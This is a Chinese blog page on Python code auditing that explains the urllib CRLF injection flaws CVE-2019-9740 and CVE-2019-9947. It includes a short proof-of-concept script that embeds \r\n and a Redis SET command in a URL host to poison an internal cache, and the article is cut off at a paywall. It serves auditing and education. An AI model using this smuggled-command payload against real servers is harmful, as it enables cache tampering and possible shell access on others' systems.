python审计案例_Python代码审计实战案例总结之CRLF和任意文件读取

最新推荐文章于 2024-08-04 02:04:14 发布
最新推荐文章于 2024-08-04 02:04:14 发布
阅读量412 收藏
点赞数
文章标签: python审计案例
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36257554/article/details/112834488
版权
本文介绍了Python代码审计中的CRLF问题和任意文件读取漏洞,通过实例展示了urllib、httplib模块中的CRLF漏洞利用,并提供了审计和修复的方法。同时,文章还讨论了local_file协议绕过导致的任意文件读取问题及其防范措施。
摘要由CSDN通过智能技术生成

介绍

Python代码审计方法多种多样,但是总而言之是根据前人思路的迁移融合扩展而形成。目前Python代码审计思路,呈现分散和多样的趋势。Python微薄研发经验以及结合实际遇到的思路和技巧进行总结,以便于朋友们的学习和参考。

CRLF和任意文件读取的审计实战

CRLF 审计实战

CRLF的问题经常会出现在Python的模块之中,曾经有案例说明httplib模块、urllib模块等存在CRLF问题。问题来源于模块对于\x0d\x0a(\r\n)处理并不严格。如果该问题被有效利用,可能会导致 Memcached和Redis 等缓存应用出现问题,严重可获得shell。在审计中多尝试插入\r\n,包括不同的位置,也许会有新的发现。

urllib CRLF漏洞(CVE-2019-9740和CVE-2019-9947)

这个问题关于urllib模块,被插入\r\n导致CRLF问题。另外,如果攻击者在攻击载荷之中加入缓存应用命令,可能导致严重的安全隐患。下面看下 POC 。

#!/usr/bin/env python3

import sys

import urllib

import urllib.error

import urllib.request

host = "10.251.0.83:6379?\r\nSET test success\r\n"

url = "http://" + host + ":8080/test/?test=a"

try:

info = urllib.request.urlopen(url).info()

print(info)

except urllib.error.URLError as e:

print(e)

POC 中使用了 sys、urllib、urllib.error、urllib.request 模块,测试目标的 IP 为 10.251.0.83 ,咱们在 host 之中插入 \r\n 和 redis 命令 “SET test success” ,目前为了实现 验证 CRLF 并且尝试污染 redis 缓存。在尝试执行此攻击后,检查redis服务器:

127.0.0.1:6379> GET

最低0.47元/天 解锁文章
上官义飞
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python审计中的应用-【干货】Python自动化审计及实现
weixin_37988176的博客
11-01 1290
在这个语法树构造中,body里包含着if构造中的语句return HttpResponse("2"),type为Compare表示该构造体为断定语句,left表示左值即源码中的type,test构造体中则是用来进行if断定,test中的ops对应着源码中的not in,表示比较断定,comparators则是被比较的元素。如许源码就和Python语法树一一对应起来,有了这些...
python代码审计案例_【一起玩蛇】Python代码审计中的那些器I
weixin_39673037的博客
02-09 270
曾今向前辈请教过,如何学习代码审计;曾今向大牛问起过,如何学好代码审计……得到的答案总是出乎的一致:多读,多审,多写;php,python,java;变量,函数,框架;赋值,传递,覆盖;……只要用心,就能学好。其实很多看起来很专的技术,只要把心静下来,用心去学习--总结--沉淀,就一定不会差。1、前言作为【一起玩蛇】系列的文章,突发奇想到python代码审计。纵观目前主流的代码审计,关于审计PHP...
python自动化审计及实现
weixin_34217711的博客
03-08 3053
xxlegend · 2015/08/03 17:010x00 摘要Python由于其简单,快速,库丰富的特点在国内使用的越来越广泛,但是一些不好的用法却带来了严重的安全问题,本文从Python源码入手,分析其语法树,跟踪数据流来判断是否存在注入点。关键词: Python 注入 源码 语法树0x01 引言Python注入问题是说用户可以控制输入,导致系统执行一些危险的操作。它是Python中比较常...
python 批量将CRLF格式txt转成LF格式
最新发布
weixin_40236186的博客
08-04 72
Python批量将CRLF格式的TXT文件转换为LF格式 在程序开发和文本处理的过程中,经常会遇到不同操作系统之间的换行符差异。Windows系统使用的换行符是CRLF(\r\n),而Unix/Linux系统则使用LF(\n)。如果你在开发中需要处理多个文本文件格式的转换,那么学习如何使用Python批量将CRLF格式的T...
python审计中的应用-基于python的自动化代码审计
weixin_37988176的博客
11-01 2489
本文通过介绍在python开发中经常出现的常规web漏洞,然后通过静态和动态两种方式对python代码进行自动化审计挖掘漏洞,并且展示自动化系统在自动化审计python应用代码的成果,本文比较长,请耐心阅读,惊喜在后面。从python常规漏洞来看都有一个共同点,那就是危险函数中使用了可控参数,如system函数中使用到的("mv %s’% filename),如execute函数中使用到...
python 财务报表审计_用Python来分析审计行业的这10年
weixin_39748858的博客
11-24 430
昨天我无意间发现了一个新大陆,激动万分。和大家分享一下。这就是TUSHARE PRO它是什么,其实它是一个免费的数据接口,也可以说是量化交易终端平台。https://tushare.pro/register?reg=278100两年前了解了TUSHARE,那个时候它还没有上市公司的财务报表数据,只有指标数据,所以当时只用过聚宽。注册了账号,看到还有财务审计意见的报告。一下激动了。晚上写了14行代码...
Spring启动之CommonDefinitionAnnotations(AnnotatedBeanDefinition abd, AnnotatedTypeMetadata metadata) 解析
研究生生活、学习记录
09-17 590
前言 本文旨在分析在Spring容器启动之时,针对特定注释的解析需要使用题目中所述方法,该方法的寻找路劲为:特定的注释的解析 ①org.springframework.context.annotation.AnnotatedBeanDefinitionReader#registerBean(java.lang.Class<?>) ---> ②org.springframework.context.annotation.AnnotatedBeanDefinitionReader#doR
代码审计学习路线
网安技术分享
09-03 2616
学习代码审计分以下四部分 一.编程语言 1.前端语言 html/javascript/dom元素使用,主要是为了挖掘xss漏洞,jquery 主要写一些涉及到CSRF脚本使用的或者DOM型XSS,JSON劫持等 2.后端语言 基础语法要知道,例如 变量类型,常量,数组(python 是列表,元组,字典),对象,类的调用,引用等, MVC设计模式要清楚,因为大部分目标程序都是基于MVC写的,包括不限于php,python,java。 不用会写,但是一定能看懂,而且要看懂逻辑,知道...
小点dian儿:Python文件读取文件拆分,读取部分数据
shuihupo的博客
12-27 6519
目录 pandas参数说明 文件部分读取参数 文件成块读取参数 成块读入,并写入其他文件。 官方文档 pandas参数说明 pandas在read_csv或 read_table有几个个参数 文件部分读取参数 nrows : int, default None Number of rows of file to read. Useful for reading pieces ...
python文件转成linux格式,怎么用python在Windows系统下,生成UNIX格式文件
weixin_29417071的博客
05-02 606
如何用python在Windows系统下,生成UNIX格式文件平时测试工作中,少不了制造测试数据。最近一个项目,我就需要制造一批可在UNIX下正确读取文件。为确保这批文件能从FTP下载成功,开发叮嘱我:“文件中凡是遇到换行,换行符必须是UNIX下的LF,而不是Dos\Windows下的CRLF。”换行,在普通文档编辑中,就是按下“Enter”键。在编写代码时,就是在文件中写入字符串”\n”。但用...
CRLF.ZIP_CRLF_lines
09-21
总的来说,"CRLF.ZIP_CRLF_lines"提供了一个实用的解决方案,解决了文本文件在UNIX/Linux和Windows系统之间转换时遇到的行结束符问题,而且其开源性质促进了代码的透明度和社区参与,鼓励用户根据自身需求进行定制。
Python审计实务与案例分析库毕业设计-附源码211526
weixin_61498557的博客
08-25 521
本文以Python为开发技术,实现了一个审计实务与案例分析库。审计实务与案例分析库的主要使用者管理员功能分为:首页、用户管理、个人中心、案例基础、标签维度、分析数据,通过这些功能模块的设计,基本上实现了整个审计实务与案例分析库的过程。 具体在系统设计上,采用了B/S的结构,同时,也使用Python技术在动态页面上进行了设计,后台上采用Mysql数据库,是一个非常优秀的审计实务与案例分析库。 关键词:审计实务与案例分析库;Django框架
Python代码审计实战案例总结之反序列化和命令执行!
爬遍所有网站
04-16 593
介绍 Python代码审计方法多种多样,但是总而言之是根据前人思路的迁移融合扩展而形成。目前Python代码审计思路,呈现分散和多样的趋势。Python微薄研发经验以及结合实际遇到的思路和技巧进行总结,以便于朋友们的学习和参考。 反序列化审计实战 反序列化漏洞在Python代码审计中属于常见高危漏洞之一,它的危害性根据执行环境略有不同,本地和远程分别为7.2和10的评分。通过评分也可得知漏洞...
python 测试app漏洞_Python代码审计实例三则
weixin_42171208的博客
12-20 327
目录一、SQL盲注二、身份认证逻辑三、条件竞争突然发现,笔者接触代码审计工作也有一年半的时间了,经历的大大小小的代码审计项目百余项,但是并没有好好的研究过关于python代码审计内容,或者说python有什么需要审计的呢?fortify拓展插件貌似也支持python审计,至少原版我没成功过。但,前不久一个小伙伴还是问了我python代码审计的问题,code终究还是code,万变不离其宗...
python自动化处理审计_自动化审计
weixin_39819671的博客
12-24 315
尹毅大牛发了个审计系统,但是毕竟是.NET写的,不太会修改代码来实现自己想要实现的功能。既然想搞审计,写个脚本框架吧。目前的想法:1.如何用python扫描一个目录下的所有文件,并逐个检查文件内容?果然,如果没有决定要学习,事情不会进展下去:两段脚本:打印出一个文件夹下所有的php文件,包括子文件夹都列举出来:importosdef main(name,*types):for root,dirs,...
python自动化处理审计_自动化代码审计
weixin_42128558的博客
02-11 403
0x00 前言大概去年的时候就想写这样一篇文章,最近看到老外写的一个ppt,于是就有了这篇文章,随便看看就好,价值不是很大。测试一个应用程序是否存在漏洞的思路总结起来无非 黑盒 和白盒 ,或者两者结合。黑盒的思路简单概括即是 通过异常输入判断程序是否存在漏洞,白盒即是 通过审阅程序代码来了解程序逻辑来判断漏洞。我这里想说的思路是结合两者的特性来完成整个过程的自动化。如果要你用一句话来概括一下白盒的...
Python系统审计-笔记
煮酒闲谈
01-19 1445
Python系统审计 运维安全 端口开放 1、自定义端口 2、通用端口 弱口令 1、数据库弱口令 2、redis&memcache 3、共享中间件 4、Nsf0cus!@# debug开关 1、`\ 2、django settings.py Debug=True svn或git信息泄露 涉密存储传输 1、用base64加密码密码 2、私钥存储
CRLF注入(响应截断)挖掘技巧及实战案例
03-05
CRLF注入(响应截断)是一种常见的Web安全漏洞,攻击者可以通过在HTTP响应中插入特殊字符来绕过服务器的安全机制,从而进行恶意操作。挖掘CRLF注入漏洞的技巧包括:使用工具扫描目标网站、手动构造HTTP请求、分析响应报文等。实战案例中,攻击者可以利用CRLF注入漏洞进行网站劫持、恶意重定向、XSS攻击等。为了防范CRLF注入漏洞,开发人员应该对输入参数进行严格的过滤和验证,避免将用户输入的数据直接拼接到HTTP响应中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值